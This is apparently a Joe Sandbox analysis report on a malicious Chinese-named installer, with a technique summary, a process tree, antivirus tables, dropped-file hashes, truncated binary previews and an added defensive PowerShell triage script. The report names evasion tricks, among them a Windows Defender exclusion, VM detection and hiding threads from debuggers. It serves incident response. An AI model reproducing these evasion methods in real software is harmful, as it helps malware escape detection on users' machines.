Defense Evasion: Masquerading (11), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (231), Access Token Manipulation (1), Process Injection (111), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (1), DLL Side-Loading (1)
Discovery: System Time Discovery (1), Security Software Discovery (431), Virtualization/Sandbox Evasion (231), Process Discovery (2), Application Window Discovery (1), System Owner/User Discovery (2), File and Directory Discovery (3), System Information Discovery (25)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1)
Impact: System Shutdown/Reboot (1)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration: no techniques flagged
Behavior Graph

Behavior Graph ID: 1579693 | Sample: #U5b89#U88c5#U52a9#U624b_2.... | Start date: 23/12/2024 | Architecture: WINDOWS | Score: 96

The graph is reproduced here as a process tree. Signatures attached to a node are listed in square brackets; files dropped by a node are listed with "dropped". Truncated paths are left as the report shows them.

Start
  [Multi AV Scanner detection for dropped file]
  [Multi AV Scanner detection for submitted file]
  [Found driver which could be used to inject code into processes]
  [3 other signatures]
  - #U5b89#U88c5#U52a9#U624b_2.0.4.exe (started)
      dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PE32)
      - #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (started)
          dropped: C:\Users\user\AppData\Local\...\update.vac (PE32)
          dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
          [Adds a directory exclusion to Windows Defender]
          - #U5b89#U88c5#U52a9#U624b_2.0.4.exe (started)
              dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PE32)
              - #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (started)
                  dropped: C:\Users\user\AppData\Local\...\update.vac (PE32)
                  dropped: C:\Program Files (x86)\...\trash (copy) (PE32+)
                  dropped: C:\Program Files (x86)\...\is-AQRNC.tmp (PE32+)
                  dropped: 3 other files (1 malicious)
                  [Query firmware table information (likely to detect VMs)]
                  [Protects its processes via BreakOnTermination flag]
                  [Hides threads from debuggers]
                  [Contains functionality to hide a thread from the debugger]
                  - 7zr.exe (started)
                      dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+)
                      - conhost.exe (started)
                  - cmd.exe (started)
                      - sc.exe (started)
                          - conhost.exe (started)
                  - 7zr.exe (started)
                      - conhost.exe (started)
          - powershell.exe (started)
              [Loading BitLocker PowerShell Module]
              - conhost.exe (started)
              - WmiPrvSE.exe (started)
  - cmd.exe (started)
      - sc.exe (started)
          - conhost.exe (started)
  - cmd.exe (started)
      - sc.exe (started)
          - conhost.exe (started)
  - 30 other processes (started)
      - sc.exe (started), three instances, each followed by conhost.exe
      - 26 other processes
          - 25 other processes

Antivirus Detection (submitted file)

Source | Detection | Scanner
#U5b89#U88c5#U52a9#U624b_2.0.4.exe | 10% | Virustotal
#U5b89#U88c5#U52a9#U624b_2.0.4.exe | 0% | ReversingLabs

Antivirus Detection (dropped files)

Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal
C:\Program Files (x86)\Windows NT\hrsw.vbc | 11% | ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc | 10% | Virustotal
C:\Program Files (x86)\Windows NT\is-AQRNC.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\is-AQRNC.tmp | 0% | Virustotal
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 4% | Virustotal
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | Virustotal
C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\update.vac | 11% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\update.vac | 11% | ReversingLabs
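The table above, together with the behavior graph, gives a responder a small set of host-side checks: the drop directory C:\Program Files (x86)\Windows NT and the file names placed in it, the Windows Defender exclusion the installer adds, the cmd.exe launching sc.exe chains (the matrix maps them to Windows Service), and the root\SecurityCenter2 AntiVirusProduct query the .tmp issues. The following PowerShell triage script is an added example and is not part of the Joe Sandbox report. It assumes it is run elevated on the host under investigation, that Get-MpPreference and Get-CimInstance are available (the SecurityCenter2 namespace exists only on client SKUs), and it uses the two SHA-256 values this report marks Malicious:true; the variable and function names are the example's own.

```powershell
# Added triage example (not Joe Sandbox output). Run elevated on the host under investigation.
# Paths and hashes below are taken from this report's dropped-file tables; everything else is assumed.

$DropDir      = 'C:\Program Files (x86)\Windows NT'
$DroppedNames = @('7zr.exe', 'hrsw.vbc', 'is-AQRNC.tmp', 'tProtect.dll', 'trash (copy)')

# SHA-256 of the two dropped files the report marks Malicious:true.
$KnownBadSha256 = @(
    '05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA',
    'BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2'
)

function Invoke-ReportTriage {
    $findings = [System.Collections.Generic.List[object]]::new()

    # 1. Files dropped into the unusual "Windows NT" directory under Program Files (x86).
    foreach ($name in $DroppedNames) {
        $path = Join-Path -Path $DropDir -ChildPath $name
        if (Test-Path -LiteralPath $path) {
            $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
            $findings.Add([pscustomobject]@{
                Check    = 'DroppedFile'
                Item     = $path
                Detail   = $hash
                KnownBad = ($KnownBadSha256 -contains $hash)
            })
        }
    }

    # 2. Defender path exclusions; the report flags "Adds a directory exclusion to Windows Defender".
    try {
        foreach ($excl in (Get-MpPreference).ExclusionPath) {
            $findings.Add([pscustomobject]@{
                Check    = 'DefenderExclusion'
                Item     = $excl
                Detail   = ''
                KnownBad = ($excl -like "$DropDir*")
            })
        }
    } catch {
        Write-Warning "Get-MpPreference failed: $_"
    }

    # 3. Services whose image path points into the drop directory (cmd.exe -> sc.exe in the graph).
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -like "*$DropDir*" } |
        ForEach-Object {
            $findings.Add([pscustomobject]@{
                Check    = 'Service'
                Item     = $_.Name
                Detail   = $_.PathName
                KnownBad = $true
            })
        }

    # 4. The same root\SecurityCenter2 query the installer .tmp issues; client SKUs only.
    try {
        Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction Stop |
            ForEach-Object {
                $findings.Add([pscustomobject]@{
                    Check    = 'SecurityCenter2'
                    Item     = $_.displayName
                    Detail   = ('productState=0x{0:X}' -f [int]$_.productState)
                    KnownBad = $false
                })
            }
    } catch {
        Write-Warning "root\SecurityCenter2 not available on this SKU: $_"
    }

    return $findings
}

$results = Invoke-ReportTriage
$results | Sort-Object KnownBad -Descending | Format-Table -AutoSize
if ($results | Where-Object KnownBad) { exit 1 } else { exit 0 }
```

A non-zero exit code means at least one finding matched a report indicator directly (a known-bad hash, an exclusion covering the drop directory, or a service pointing into it); any file present in the drop directory with a different hash is still worth pulling, since related samples in this report's context section ship different builds of the same names.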
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
URLs (no antivirus detections recorded for any entry)

Name | Source | Malicious | Reputation
https://aria2.github.io/Usage: | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr | false | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b_2.0.4.exe | false | high
https://github.com/aria2/aria2/issuesReport | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr | false | high
http://www.metalinker.org/ | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr | false | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EBFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1694925449.0000000000E01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000000.1786864198.0000000000DBD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr | false | high
https://aria2.github.io/ | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr | false | high
https://github.com/aria2/aria2/issues | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr | false | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EBFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1694925449.0000000000E01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000000.1786864198.0000000000DBD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr | false | high
http://www.metalinker.org/basic_string::_M_construct | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.dr | false | high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579693
                    Start date and time:2024-12-23 07:49:49 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 2s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of new started processes analysed:110
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                    renamed because original name is a hash value
                    Original Sample Name:_2.0.4.exe
                    Detection:MAL
                    Classification:mal96.evad.winEXE@144/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 66
                    • Number of non-executed functions: 74
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                    • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 172.202.163.200
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    No context
                    No context
                    No context
                    No context
Dropped Files (Joe Sandbox context)

Match: C:\Program Files (x86)\Windows NT\7zr.exe
Associated samples (all detection: malicious, threat name: Unknown):
  • #U5b89#U88c5#U52a9#U624b_2.0.5.exe
  • Zt43pLXYiu.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe
  • Zt43pLXYiu.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.1.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.1.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe

Match: C:\Program Files (x86)\Windows NT\hrsw.vbc
Associated samples (all detection: malicious, threat name: Unknown):
  • #U5b89#U88c5#U52a9#U624b_2.0.5.exe
  • Zt43pLXYiu.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe
  • Zt43pLXYiu.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.1.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.1.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):831200
                                                        Entropy (8bit):6.671005303304742
                                                        Encrypted:false
                                                        SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                                        MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                                        SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                                        SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                                        SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):250000
                                                        Entropy (8bit):7.999233217470119
                                                        Encrypted:true
                                                        SSDEEP:6144:PXyeefmG6AmpTDIX5m4kwCHIgLCSQ+pukav5Ew0rCFBp:PTYNmpn2o4kxO1tR9Fv
                                                        MD5:F3E50B3F3BA2DAECD6DFD250FC1FBF59
                                                        SHA1:9D9140B5C80B29527B4D80A57EA7EB2977756F56
                                                        SHA-256:E02FF764DC2A42E59039C9E73BD6F6D337CB8C7646FC13ABFAA5A0799C3BA20E
                                                        SHA-512:F61BE85D5E6AD21B2E1D74B4495F491D1953432E43A4D025C830F8CE6BB49B94CF1355974513FF2979261EFD1FB15DE563ABD2AB32DBAAB88C0721B975634C60
                                                        Malicious:false
                                                        Preview:.@S...."NtS.,................._.?.....r..~...{Dt*?[.U.@..6....G..jJ0..m...^.. ..S......A........M.O..d...|.......5/$@;....?2&.<....l./..u.,aiG.1+..)..?....M.\.xw..ScRH.h'.4L.........!...i...1.1...3;..@..v7$..e..=V Oo..r...<..'...]dg..6E......i.?[.%.uM.f.'....zi..0^....AM....>.`..y.T.8..;..'.T:.=..R..[.l.>z...%H.m.!.Hu.u)...,.F.M!.....d..Xw.B.s..A._...F..Bs....l|^`...o;.T.5f...#Y...*......V....N..4...{.Q..1.F.z..p.rm....SAlV0.lY]....y.....9~.....x........5..o[.. ...u.g.r.a<o.._...@.eN......B.........U.......B...sM...5..B.}.7Lo.o3..IO..5.;..E..Y:e.......[.v..3d.O.?...k..\.....X9.......C..q..j.,...{.../..J....s......m..1.6.D_.sc`...~.?..@.3.6....!..}6ON.q..Qe..6J....PdJ.....D7.k.S\.......7.a.bM&;.......w.....E.E9l6..+t<.yt..$.xb../ ...A....'.*!.AL......Q....>..@.-...n...O.:.P#..P.Uz_..@.VdH.,#........6.R...z./-_.bBp.u..^`.h....Rt.......dN..G....[l...|.,I...bP.f...<"....aIw..$....}....._yZ..y.....{.....g&.?.......T..Dnr...;.Z..,.._>..=m;9..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        • Antivirus: Virustotal, Detection: 10%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5649408
                                                        Entropy (8bit):6.392614480390128
                                                        Encrypted:false
                                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):250000
                                                        Entropy (8bit):7.999233217470119
                                                        Encrypted:true
                                                        SSDEEP:6144:PXyeefmG6AmpTDIX5m4kwCHIgLCSQ+pukav5Ew0rCFBp:PTYNmpn2o4kxO1tR9Fv
                                                        MD5:F3E50B3F3BA2DAECD6DFD250FC1FBF59
                                                        SHA1:9D9140B5C80B29527B4D80A57EA7EB2977756F56
                                                        SHA-256:E02FF764DC2A42E59039C9E73BD6F6D337CB8C7646FC13ABFAA5A0799C3BA20E
                                                        SHA-512:F61BE85D5E6AD21B2E1D74B4495F491D1953432E43A4D025C830F8CE6BB49B94CF1355974513FF2979261EFD1FB15DE563ABD2AB32DBAAB88C0721B975634C60
                                                        Malicious:false
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):56562
                                                        Entropy (8bit):7.996582801995233
                                                        Encrypted:true
                                                        SSDEEP:1536:3F0eJo4+8uBWHKxbKOjr9BhmraXVJ9twDJ0y2Q6XqT5l:36ezuBWHiMaXKmLQ6XqNl
                                                        MD5:E769F3D07898BEF062E8B54B4106F3EC
                                                        SHA1:F5B22B500440E3CDB0DE8FDCF358315F3F189733
                                                        SHA-256:209FEBE4F67AB02005B86988E23CAE0F04BB9792EEE20A022377662BFE27756A
                                                        SHA-512:9A3455BD08A5F8CC5996192298B68E9681876080FC2B95F90954143D0931B10B10C3D5590CA5CE78BAD295D9C9B9A6B9FF00E5DEE429D6712C78C28F0B9E6C12
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):56562
                                                        Entropy (8bit):7.996582801995233
                                                        Encrypted:true
                                                        SSDEEP:1536:QjaZEp/McY1uLZ39pjWJjrYs7vYCM2nXyfJzc3n+7xrM:eaZZ89rjCj3vrXyfJzc3E2
                                                        MD5:19706ECE8EF8BE5854CEF996036FD25D
                                                        SHA1:5D6DACF970F731A8629627DB5F5F276541BB5AFA
                                                        SHA-256:04D815A3E4CEB9925032A39AB6239F7B95ED761A957483A64373FDCC25913247
                                                        SHA-512:6912573C4411CA4EE6044FAA3FA5E7381BDB3285808090FAA80E8F35499439778619DD36A4F2D3DF9589DA0AF52926CCBAD6691AF366F031B6CA31B4B65E5A16
                                                        Malicious:false
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.996966859255975
                                                        Encrypted:true
                                                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                                                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                                                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.996966859255979
                                                        Encrypted:true
                                                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                                        MD5:4CB8B7E557C80FC7B014133AB834A042
                                                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                                        Malicious:false
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):31890
                                                        Entropy (8bit):7.99402458740637
                                                        Encrypted:true
                                                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                                        MD5:8622FC7228777F64A47BD6C61478ADD9
                                                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):31890
                                                        Entropy (8bit):7.99402458740637
                                                        Encrypted:true
                                                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                                        Malicious:false
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):74960
                                                        Entropy (8bit):7.99759370165655
                                                        Encrypted:true
                                                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                                        MD5:950338D50B95A25F494EE74E97B7B7A9
                                                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):74960
                                                        Entropy (8bit):7.997593701656546
                                                        Encrypted:true
                                                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                                        MD5:059BA7C31F3E227356CA5F29E4AA2508
